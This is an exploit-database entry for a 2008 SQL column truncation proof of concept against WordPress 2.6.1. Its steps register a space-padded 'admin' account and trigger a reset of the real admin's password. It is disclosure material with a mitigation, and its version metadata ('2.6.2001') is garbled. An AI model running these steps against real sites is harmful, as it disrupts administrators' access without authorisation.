header-logo
Suggest Exploit
vendor:
WordPress
by:
irk4z
4.3
CVSS
MEDIUM
SQL Column Truncation Vulnerability
89
CWE
Product Name: WordPress
Affected Version From: 2.6.2001
Affected Version To: 2.6.2001
Patch Exists: No
Related CWE: N/A
CPE: a:wordpress:wordpress:2.6.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)

This vulnerability allows an attacker to remotely change the admin password of a WordPress website if registration is enabled. The attacker first registers an account with the username 'admin' followed by 55 spaces and the letter 'x'. This creates a duplicate 'admin' account in the database. The attacker then requests a password reset for the duplicate account and the password is changed, but the new password is sent to the correct admin email.

Mitigation:

Disable registration on the WordPress website or limit the length of usernames.
Source

Exploit-DB raw data:

# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
# 
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends

1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin                                                       x
email: your email

^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin's password changed, but new password will be send to correct admin email ;/

# milw0rm.com [2008-09-07]